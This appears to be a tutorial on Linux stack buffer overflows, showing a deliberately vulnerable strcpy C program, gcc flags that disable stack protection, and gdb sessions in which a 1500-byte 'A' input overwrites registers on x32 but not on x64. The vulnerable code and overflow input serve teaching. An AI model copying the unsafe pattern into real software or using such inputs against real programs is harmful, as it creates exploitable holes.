Classic Buffer overflow exploits on Linux x64
If you are learning buffer overflow exploit development on Linux x64 machine, then there are something which you need to take care of.
This is because architecture and execution of programs in x64 machine model is completely different from x32 machine model.
For a reference to stack frame in x64, refer to this link
Consider this C program and I will demonstrate the effect of compiling this program for x32 and x64.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[500];
strcpy(buffer, argv[1]); //vulnerable function
return 0;
}If you are on x64, simply executing this command will compile it for x64
gcc -ggdb -m64 -o buffer1 -fno-stack-protector -mpreferred-stack-boundary=4 buffer1.cAnd this one for x32
gcc -ggdb -m32 -o buffer1 -fno-stack-protector -mpreferred-stack-boundary=4 buffer1.cLet’s try to exploit this buffer overflow vulnerability using gdb on both the versions. Here are the outputs
x64
madhur@bt:~/buffer$ gdb buffer1
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/madhur/buffer/buffer1...done.
(gdb) run $(python -c 'print "\x41" * 1500')
Starting program: /home/madhur/buffer/buffer1 $(python -c 'print "\x41" * 1500')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400565 in main (argc=Cannot access memory at address 0x4141414141413f3d
) at buffer1.c:10
10 }
(gdb) info registers
rax 0x0 0
rbx 0x0 0
rcx 0x41414141414141 18367622009667905
rdx 0x1000 4096
rsi 0x7fffffffe769 140737488349033
rdi 0x7fffffffe1f0 140737488347632
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffde28 0x7fffffffde28
r8 0x7ffff7dd8300 140737351877376
r9 0x5c0 1472
r10 0x7 7
r11 0x7ffff7ba92a0 140737349587616
r12 0x400440 4195392
r13 0x7fffffffdf00 140737488346880
r14 0x0 0
r15 0x0 0
rip 0x400565 0x400565 <main+65>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0x32
madhur@bt:~/buffer$ gdb buffer1
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/madhur/buffer/buffer1...done.
(gdb) run $(python -c 'print "\x41" * 1500')
Starting program: /home/madhur/buffer/buffer1 $(python -c 'print "\x41" * 1500')
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x0 0
edx 0x5dd 1501
ebx 0xf7fbdff4 -134488076
esp 0xffffcf80 0xffffcf80
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) As you can see in the outputs above, there is no EIP register in x64 version of program. And in the x32 version, the EIP value is correctly corrupted with our overflowed value of x41.